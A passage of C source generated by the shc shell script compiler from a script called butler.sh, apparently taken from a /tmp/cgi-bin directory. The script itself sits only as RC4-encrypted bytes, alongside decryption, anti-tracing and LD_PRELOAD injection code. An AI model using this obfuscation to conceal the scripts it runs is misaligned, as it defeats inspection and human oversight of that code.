#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/abdhkojdgjjaa12as23j891dgz1_TAC/butler.sh 
#endif

static  char data [] = 
#define      chk1_z	22
#define      chk1	((&data[3]))
	"\307\103\241\232\205\147\007\303\024\065\201\150\102\255\246\027"
	"\017\113\272\004\314\377\150\040\157\121\311\123"
#define      chk2_z	19
#define      chk2	((&data[28]))
	"\061\154\205\332\142\132\174\045\025\076\165\357\344\011\055\176"
	"\364\033\342\122\116"
#define      shll_z	10
#define      shll	((&data[51]))
	"\351\037\031\202\133\261\154\105\225\336\315\063\161"
#define      msg1_z	65
#define      msg1	((&data[69]))
	"\321\024\311\162\147\273\140\060\212\210\215\111\216\216\062\343"
	"\230\353\310\222\054\225\345\306\352\351\203\046\366\237\022\073"
	"\345\226\362\225\160\323\130\170\361\055\126\023\047\353\041\275"
	"\115\244\231\315\111\300\213\222\334\332\011\014\335\260\122\212"
	"\347\231\307\241\161\145\110\012\145\124\343\372\033\047\233\154"
#define      pswd_z	256
#define      pswd	((&data[202]))
	"\374\176\276\113\273\174\270\244\233\052\304\005\260\225\032\171"
	"\010\201\065\150\346\211\113\341\245\162\175\021\143\155\175\140"
	"\353\073\254\246\270\145\112\124\217\017\132\077\245\164\271\255"
	"\365\356\026\334\170\141\276\035\324\073\057\070\357\356\124\357"
	"\172\260\051\214\075\066\320\307\360\024\300\243\140\132\230\234"
	"\103\101\051\347\274\171\071\322\260\150\044\240\126\171\217\321"
	"\051\270\135\147\357\056\056\337\102\357\202\242\111\033\077\214"
	"\134\150\163\031\342\255\353\222\025\017\062\154\211\301\076\262"
	"\172\233\032\152\312\110\112\015\067\315\257\200\350\357\015\105"
	"\130\201\136\072\057\112\314\104\132\377\261\343\301\357\226\074"
	"\213\260\246\125\370\361\142\060\276\022\261\247\002\277\355\132"
	"\100\114\225\157\226\142\264\361\141\145\324\043\125\152\137\340"
	"\033\005\066\024\367\231\104\266\254\366\136\256\265\113\011\366"
	"\230\237\145\056\001\032\040\143\177\364\206\325\137\345\266\172"
	"\353\354\216\343\206\323\231\062\311\367\341\177\103\353\165\333"
	"\212\333\012\214\365\052\357\165\037\166\112\176\134\000\371\110"
	"\355\207\053\163\133\305\246\044\274\210\244\000\163\031\333\376"
	"\364\345\212\351\020\171\137\057\360\251\255\114\252\246\225\227"
	"\056\300\013\211\205\262\256\102\072\122\102\256\154\036\254\140"
	"\004\066\112\024\260\251\103\241\123\361\356\375\250\255\230\224"
	"\351\105\072\241\252\205\365\071\225\120\171\072\304\062\350\272"
	"\041\376\227\231\140\125\267"
#define      inlo_z	3
#define      inlo	((&data[485]))
	"\116\032\220"
#define      lsto_z	1
#define      lsto	((&data[488]))
	"\025"
#define      date_z	1
#define      date	((&data[489]))
	"\117"
#define      xecc_z	15
#define      xecc	((&data[490]))
	"\036\001\025\240\013\251\161\044\161\206\133\300\374\315\307"
#define      tst1_z	22
#define      tst1	((&data[508]))
	"\057\042\144\377\165\155\160\255\124\026\122\335\130\353\132\112"
	"\077\321\133\252\125\205\306\207\333"
#define      msg2_z	19
#define      msg2	((&data[531]))
	"\333\247\065\071\100\057\123\046\250\346\115\220\354\325\024\335"
	"\167\326\037\224"
#define      rlax_z	1
#define      rlax	((&data[550]))
	"\006"
#define      opts_z	1
#define      opts	((&data[551]))
	"\251"
#define      text_z	2898
#define      text	((&data[1139]))
	"\331\140\064\107\232\310\115\151\105\230\161\144\216\377\170\276"
	"\042\334\146\200\005\101\306\350\076\012\142\324\257\061\042\210"
	"\222\126\317\055\037\035\226\145\266\010\311\104\010\101\003\052"
	"\036\151\253\043\253\161\013\351\174\156\275\053\237\340\264\062"
	"\067\204\137\126\241\365\273\127\376\205\234\006\307\237\061\345"
	"\011\334\011\264\116\025\235\312\203\133\366\043\073\252\125\162"
	"\057\264\311\320\252\205\050\250\012\305\257\321\145\340\267\156"
	"\275\300\043\014\325\301\327\131\034\315\174\130\170\321\313\247"
	"\205\224\170\060\031\240\331\044\146\210\366\313\151\255\071\047"
	"\156\134\064\104\035\013\235\072\331\031\223\121\352\136\371\160"
	"\363\161\241\015\022\172\061\170\003\050\103\155\325\175\224\104"
	"\332\310\210\370\324\045\063\255\077\306\376\051\045\370\232\030"
	"\151\073\045\174\265\127\364\271\177\070\046\125\266\272\232\220"
	"\203\042\210\130\110\274\005\207\202\004\261\247\374\113\300\146"
	"\206\346\342\074\075\327\365\275\017\033\023\305\326\255\126\132"
	"\317\337\262\030\233\270\237\035\274\120\305\271\234\205\037\042"
	"\153\002\137\251\331\125\147\351\161\172\256\107\047\005\242\367"
	"\344\125\017\177\015\256\235\311\377\142\202\233\350\242\276\124"
	"\244\036\375\175\163\144\146\344\336\025\054\006\032\317\376\377"
	"\044\015\176\061\274\033\373\273\175\176\127\146\040\025\272\304"
	"\063\267\102\247\034\251\214\372\276\270\001\331\210\377\330\254"
	"\015\127\336\311\162\331\205\360\127\334\126\170\362\020\075\046"
	"\307\200\315\343\051\131\336\350\022\340\302\232\340\232\107\355"
	"\362\045\267\144\377\074\124\127\031\253\317\014\273\015\062\203"
	"\215\000\147\266\132\106\237\155\046\141\010\006\374\117\364\356"
	"\165\253\122\164\350\247\313\002\123\232\016\016\250\101\221\065"
	"\102\371\354\235\077\213\012\146\354\022\154\350\142\141\327\327"
	"\014\052\114\365\322\027\367\045\262\006\063\132\110\305\217\213"
	"\277\173\050\376\007\063\144\363\106\321\334\251\062\263\200\077"
	"\336\314\065\260\344\055\325\226\064\011\360\174\317\200\010\216"
	"\374\061\215\003\144\361\367\253\303\323\124\365\207\325\065\146"
	"\242\152\026\206\227\354\035\313\366\016\110\306\216\121\124\213"
	"\202\341\216\347\323\205\222\226\131\347\214\340\275\301\106\137"
	"\054\135\345\304\111\002\217\100\020\330\006\237\051\133\052\253"
	"\074\271\223\020\076\046\246\227\015\062\170\312\364\277\052\041"
	"\034\020\345\146\022\165\247\043\115\255\303\167\010\356\043\105"
	"\247\266\125\346\334\374\176\352\057\366\265\101\366\024\236\327"
	"\160\170\256\033\124\320\336\264\041\157\015\227\367\352\107\160"
	"\210\262\035\311\126\014\341\255\175\112\325\067\120\141\010\011"
	"\356\061\322\027\045\276\271\233\273\224\045\232\260\162\100\000"
	"\357\251\234\324\003\255\171\161\301\266\222\207\077\331\014\132"
	"\267\153\224\237\002\271\367\256\105\267\003\120\062\270\114\021"
	"\065\072\171\073\234\117\172\261\220\133\337\131\352\301\345\201"
	"\037\345\227\004\103\060\074\236\171\202\224\131\232\147\067\376"
	"\240\373\337\356\053\344\334\335\367\372\105\132\351\164\103\107"
	"\133\234\142\246\143\216\252\274\265\126\025\313\376\373\153\036"
	"\304\062\325\276\300\171\024\315\014\104\265\217\046\023\133\206"
	"\004\043\010\275\333\005\005\174\163\254\230\153\013\042\132\071"
	"\257\105\071\007\050\134\266\041\376\250\222\150\267\004\361\372"
	"\032\111\045\037\373\321\334\171\352\275\206\231\051\116\202\020"
	"\163\335\063\227\225\316\305\230\230\041\155\077\204\056\316\211"
	"\264\311\100\152\241\272\233\146\226\212\105\125\211\107\057\325"
	"\123\230\366\263\200\204\166\025\076\366\151\312\000\145\073\226"
	"\050\041\363\315\277\251\303\033\263\010\152\262\064\352\023\255"
	"\321\201\107\324\107\064\103\133\301\355\124\201\346\103\137\173"
	"\374\221\134\234\301\362\203\165\072\152\200\337\117\112\146\117"
	"\325\373\316\175\113\311\212\031\371\050\053\066\301\240\024\203"
	"\016\177\201\324\351\370\225\261\132\173\002\341\017\015\202\322"
	"\361\122\203\305\152\164\177\211\057\343\017\373\052\377\052\047"
	"\202\213\010\271\116\131\314\075\015\113\007\253\377\065\355\051"
	"\002\257\043\215\174\001\054\353\002\263\152\234\232\040\364\273"
	"\070\335\345\237\117\277\375\115\137\122\266\325\244\326\142\167"
	"\043\237\030\066\255\275\031\313\261\025\123\142\221\102\234\066"
	"\203\252\266\331\160\255\222\026\243\244\002\035\102\325\067\076"
	"\115\223\205\122\055\221\151\046\126\273\070\161\203\202\355\165"
	"\060\234\103\035\231\244\370\206\336\272\167\246\340\046\173\050"
	"\332\016\207\060\071\116\324\027\014\131\264\042\142\001\102\372"
	"\307\373\172\200\362\105\255\250\040\135\136\237\361\234\212\051"
	"\001\235\363\001\135\010\213\244\170\304\266\012\105\340\330\125"
	"\342\272\367\247\105\224\103\355\214\330\121\216\251\350\153\264"
	"\330\032\231\352\375\076\173\060\063\224\064\357\000\105\352\011"
	"\015\102\362\076\356\145\355\240\351\162\370\127\174\321\354\014"
	"\240\316\115\163\163\037\042\271\100\064\330\225\054\127\246\367"
	"\152\033\224\004\245\264\112\111\061\257\332\177\277\271\002\161"
	"\315\245\333\365\156\106\033\162\317\176\225\300\115\051\257\204"
	"\065\317\373\220\173\004\350\057\140\151\232\003\077\036\077\347"
	"\243\100\300\042\362\115\110\204\022\152\147\317\316\062\245\374"
	"\017\171\034\305\064\116\006\344\334\142\245\004\137\156\027\330"
	"\222\146\001\224\021\354\072\260\062\227\353\152\231\257\276\060"
	"\041\066\103\152\124\201\176\346\170\342\010\262\055\314\264\254"
	"\224\345\357\167\303\123\234\160\217\230\040\101\250\241\207\362"
	"\100\127\340\005\011\264\262\126\165\071\043\140\037\255\304\063"
	"\154\205\375\327\347\054\077\367\107\315\125\351\227\300\317\262"
	"\053\046\210\262\011\277\027\315\207\317\302\105\222\216\377\376"
	"\337\146\167\020\305\267\313\002\142\041\004\160\260\141\341\113"
	"\231\125\216\230\354\166\225\367\334\043\171\216\132\237\207\145"
	"\076\360\160\275\114\104\006\164\224\172\026\116\012\156\265\256"
	"\321\170\311\010\221\057\107\277\006\201\244\202\226\065\144\033"
	"\235\150\045\120\250\233\303\174\310\233\147\160\204\124\350\362"
	"\107\260\057\077\077\144\071\356\103\054\371\147\210\277\173\257"
	"\131\215\034\213\340\073\262\176\254\151\275\160\041\172\257\315"
	"\317\354\304\132\007\105\343\227\255\303\073\213\016\173\076\001"
	"\201\246\127\216\204\373\352\121\317\242\341\046\260\107\141\247"
	"\334\135\363\303\134\304\053\026\001\027\355\132\163\354\140\267"
	"\112\262\317\026\012\177\213\141\362\212\015\165\174\242\112\237"
	"\026\243\170\272\154\345\373\002\340\114\341\237\123\102\312\160"
	"\024\336\352\000\151\376\175\136\065\203\014\261\136\305\146\053"
	"\022\362\266\343\133\374\257\237\137\111\200\235\237\041\061\355"
	"\333\176\025\103\037\315\173\362\331\301\034\031\202\000\274\016"
	"\115\132\157\061\327\033\240\347\303\351\014\313\072\201\131\104"
	"\071\021\275\177\263\062\112\332\363\364\271\003\035\352\011\253"
	"\236\063\174\276\266\077\377\034\014\124\000\316\313\175\053\216"
	"\341\136\145\103\146\113\044\020\114\345\004\123\005\222\024\220"
	"\072\275\310\050\243\036\311\364\032\364\152\021\305\113\362\102"
	"\177\014\167\203\153\050\072\321\345\326\220\177\340\261\323\135"
	"\114\161\075\124\277\245\174\246\027\013\202\351\371\015\225\347"
	"\214\050\211\143\375\271\344\024\133\123\056\317\060\146\106\060"
	"\037\324\077\334\214\057\363\156\371\200\307\277\352\164\157\137"
	"\160\035\035\216\156\010\325\177\262\230\343\247\207\176\341\147"
	"\320\365\333\253\150\071\301\075\165\326\340\165\344\020\356\244"
	"\051\325\135\003\366\123\045\004\264\142\220\061\237\320\157\340"
	"\130\076\217\135\016\203\245\272\147\010\106\326\044\201\363\243"
	"\205\024\145\114\223\142\264\375\311\371\234\060\066\114\030\332"
	"\261\241\024\257\076\332\043\363\355\260\125\362\134\133\135\211"
	"\202\304\111\351\066\157\251\147\247\213\154\337\303\200\202\004"
	"\242\062\304\020\005\025\271\345\044\371\001\012\244\112\247\340"
	"\227\257\305\102\243\301\036\335\011\100\256\252\055\202\223\155"
	"\151\124\323\253\073\315\050\203\032\065\242\024\351\102\014\175"
	"\014\322\040\147\250\006\247\330\166\141\001\136\140\070\147\037"
	"\020\144\275\103\010\275\304\161\304\123\270\300\222\166\162\274"
	"\124\021\333\323\220\062\267\056\037\235\053\047\334\331\103\300"
	"\077\325\323\050\012\076\030\017\106\173\236\233\362\047\223\104"
	"\007\227\127\014\133\101\243\003\211\041\044\375\206\155\303\166"
	"\123\150\153\306\363\057\306\262\115\210\124\242\036\065\253\243"
	"\337\163\073\110\062\362\257\321\376\061\373\106\312\210\147\247"
	"\163\043\105\233\014\077\265\171\112\241\133\162\061\224\044\213"
	"\056\314\142\174\017\357\023\365\170\273\100\041\157\261\023\364"
	"\201\327\156\042\354\217\062\000\321\254\225\347\074\255\141\276"
	"\005\332\062\115\303\343\005\367\154\304\200\113\320\172\376\040"
	"\301\033\070\330\253\341\012\040\031\312\177\243\322\353\015\112"
	"\273\015\234\166\344\131\067\322\133\342\243\112\344\045\364\120"
	"\311\214\367\163\157\171\153\216\133\133\150\327\377\043\214\043"
	"\362\021\124\303\064\124\016\043\162\275\103\326\274\227\126\270"
	"\337\007\306\367\002\221\256\030\266\240\016\303\142\047\212\246"
	"\306\343\001\341\157\376\342\334\014\022\262\057\363\111\315\305"
	"\250\321\335\370\136\105\365\342\122\256\102\073\013\107\373\301"
	"\232\237\336\362\067\326\177\000\104\002\201\156\201\076\370\040"
	"\240\206\204\024\202\115\023\077\117\340\321\216\271\036\142\204"
	"\171\355\060\323\365\221\031\216\303\024\330\275\064\207\107\177"
	"\376\267\246\135\323\237\071\175\265\171\075\131\005\027\257\360"
	"\200\146\052\102\100\274\167\053\352\044\276\345\064\365\066\341"
	"\265\363\042\044\155\357\367\213\056\357\213\124\010\116\125\055"
	"\006\055\051\105\373\341\032\056\143\140\225\175\376\267\364\340"
	"\176\001\136\325\230\215\313\072\137\360\364\336\024\124\322\201"
	"\064\343\050\071\215\236\354\316\364\325\370\136\127\264\336\327"
	"\011\375\230\066\363\151\070\347\203\053\037\253\367\203\305\030"
	"\250\143\256\224\101\271\305\336\104\352\152\342\063\156\201\347"
	"\000\035\241\032\135\221\050\337\052\326\353\175\072\107\226\353"
	"\344\071\007\064\006\017\022\176\300\327\000\121\233\102\017\132"
	"\250\242\251\120\011\211\027\352\123\035\320\331\004\256\252\262"
	"\157\346\366\036\104\071\243\025\354\023\227\007\113\077\207\006"
	"\102\130\362\070\307\252\027\221\326\140\036\273\230\307\246\047"
	"\301\146\050\032\251\070\331\263\344\133\351\134\061\171\232\165"
	"\125\170\037\045\143\241\356\116\167\036\066\241\366\217\071\266"
	"\111\002\074\054\310\303\054\061\275\063\377\240\000\007\360\323"
	"\322\163\135\032\224\067\314\177\261\043\232\017\230\271\212\375"
	"\375\007\255\352\313\141\237\234\321\132\035\122\041\016\262\061"
	"\047\051\235\243\306\175\162\012\207\114\101\213\365\260\337\074"
	"\212\140\326\210\001\032\322\376\306\126\173\027\063\005\035\304"
	"\354\266\047\155\166\201\324\344\127\270\056\152\056\202\315\173"
	"\262\327\303\010\165\071\230\046\043\054\243\344\322\247\301\015"
	"\017\066\301\177\356\272\263\340\265\313\077\057\012\141\056\271"
	"\100\265\320\104\365\045\253\212\243\155\243\025\032\065\221\213"
	"\314\245\267\301\115\303\170\051\342\146\134\273\316\115\276\310"
	"\206\367\332\005\225\115\115\257\013\210\265\334\230\123\077\004"
	"\271\351\145\134\244\122\236\004\273\150\034\316\332\133\237\041"
	"\333\230\203\242\321\336\043\112\232\140\366\051\341\055\133\173"
	"\277\116\240\107\027\070\211\274\201\031\361\213\354\114\132\200"
	"\113\323\313\066\220\017\122\276\072\234\065\263\025\225\053\313"
	"\136\250\003\232\331\157\273\001\203\026\040\021\215\007\164\346"
	"\312\057\223\025\377\040\032\006\030\132\037\034\151\201\016\214"
	"\050\315\065\300\121\265\015\101\033\311\321\204\331\156\013\027"
	"\314\234\204\046\243\016\205\331\375\031\256\356\065\254\001\014"
	"\330\025\027\214\107\164\050\316\337\003\074\137\046\245\167\177"
	"\053\055\015\025\061\250\300\117\166\140\221\104\332\350\302\064"
	"\315\033\241\071\314\256\350\131\017\261\073\076\230\023\161\112"
	"\264\122\177\240\021\067\051\375\105\074\056\107\065\257\276\115"
	"\342\317\126\076\334\332\331\326\211\304\146\256\217\250\251\135"
	"\313\061\341\200\362\111\174\030\337\253\327\005\315\370\101\263"
	"\157\000\306\001\172\037\171\057\057\223\374\307\031\027\011\315"
	"\332\110\347\264\202\276\031\313\217\105\026\047\253\323\000\242"
	"\323\300\265\052\166\114\232\237\325\327\251\223\175\021\150\267"
	"\354\144\042\214\231\350\330\243\211\227\301\251\213\331\260\104"
	"\376\337\344\162\252\014\331\110\351\253\070\173\162\322\144\324"
	"\232\057\047\145\115\140\230\053\235\173\275\136\161\051\172\305"
	"\236\050\307\311\034\157\237\327\123\330\140\025\151\025\247\325"
	"\336\104\240\064\212\147\064\233\203\321\377\122\055\042\122\002"
	"\237\163\147\207\077\011\232\035\025\320\244\253\006\334\375\052"
	"\115\140\364\307\156\054\212\356\376\146\017\220\022\276\120\270"
	"\146\045\252\046\370\235\225\006\003\145\330\017\103\062\310\225"
	"\211\046\210\156\267\362\342\315\352\336\134\257\336\360\051\100"
	"\276\353\366\047\313\365\201\023\240\257\127\017\114\156\170\313"
	"\057\317\257\112\077\157\351\171\045\135\040\030\301\032\340\166"
	"\133\306\061\343\006\153\121\270\164\226\372\350\047\031\343\107"
	"\022\030\123\054\323\377\115\151\177\124\307\010\273\076\103\114"
	"\137\326\354\301\050\350\240\252\226\033\130\175\017\122\006\230"
	"\304\233\071\362\245\056\276\157\231\175\330\343\050\327\333\031"
	"\015\211\202\240\077\104\107\146\131\246\237\013\377\057\276\364"
	"\067\140\337\262\355\374\230\155\101\246\017\164\027\202\250\215"
	"\012\041\054\151\052\352\150\370\104\107\241\021\261\175\211\134"
	"\161\213\315\125\364\043\174\036\102\357\071\037\142\306\174\311"
	"\353\322\315\052\146\236\052\007\135\234\021\263\227\015\152\262"
	"\277\171\323\175\141\164\312\267\327\224\143\031\055\232\316\302"
	"\161\131\231\316\355\266\006\370\330\206\172\227\113\121\377\240"
	"\103\231\365\113\352\340\163\144\321\127\124\156\057\325\015\113"
	"\071\206\103\324\342\134\020\126\040\210\116\320\137\031\103\046"
	"\367\036\172\304\151\364\373\034\276\234\374\203\045\152\365\257"
	"\122\231\367\345\350\037\322\264\157\013\072\050\070\100\156\044"
	"\135\134\102\222\361\246\224\105\152\154\312\020\101\301\126\217"
	"\374\160\177\330\126\362\220\151\321\125\362\100\324\173\101\366"
	"\234\130\177\052\036\135\371\273\052\074\125\134\253\125\367\033"
	"\317\251\110\270\335\252\315\212\343\111\223\242\034\075\156\233"
	"\007\043\370\101\340\320\304\066\361\065\047\261\166\173\002\346"
	"\136\325\055\130\231\030\330\365\240\116\312\177\376\317\074\220"
	"\063\031\251\071\067\106\017\115\376\026\072\321\117\134\103\220"
	"\251\323\042\175\056\147\134\311\233\004\026\104\113\150\226\131"
	"\151\110\371\236\061\066\101\234\206\277\250\323\160\214\164\361"
	"\265\132\066\236\337\231\001\105\112\263\333\203\010\044\265\337"
	"\105\322\357\052\071\002\237\340\046\355\216\352\144\226\330\207"
	"\333\200\076\061\146\033\055\344\005\135\332\272\201\220\232\306"
	"\143\211\360\235\214\220\175\262\176\013\234\342\242\165\152\176"
	"\365\251\257\133\304\335\100\311\072\033\204\273\254\036\201\017"
	"\250\162\254\064\003\052\347\201\066\204\144\330\371\316\126\357"
	"\170\006\113\074\343\213\005\035\246\212\331\122\251\133\142\121"
	"\315\017\206\321\071\156\122\157\362\266\107\354\205\236\334\375"
	"\244\047\071\207\262\077\245\131\311\176\253\162\331\016\304\247"
	"\035\113\170\126\271\313\306\254\201\016\230\007\254\165\005\120"
	"\234\076\330\117\176\176\250\110\374\124\273\326\142\177\176\177"
	"\313\366\325\204\302\234\060\103\252\311\113\126\076\120\247\333"
	"\217\200\052\015\376\322\126\373\047\021\322\211\221\120\010\134"
	"\107\336\340\011\172\021\115\045\332\230\173\031\350\043\364\170"
	"\243\037\205\241\362\334\234\031\355"
#define      tst2_z	19
#define      tst2	((&data[4260]))
	"\277\253\332\313\075\034\325\264\107\223\304\224\355\230\215\200"
	"\110\042\340\156\113\145\006\212"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
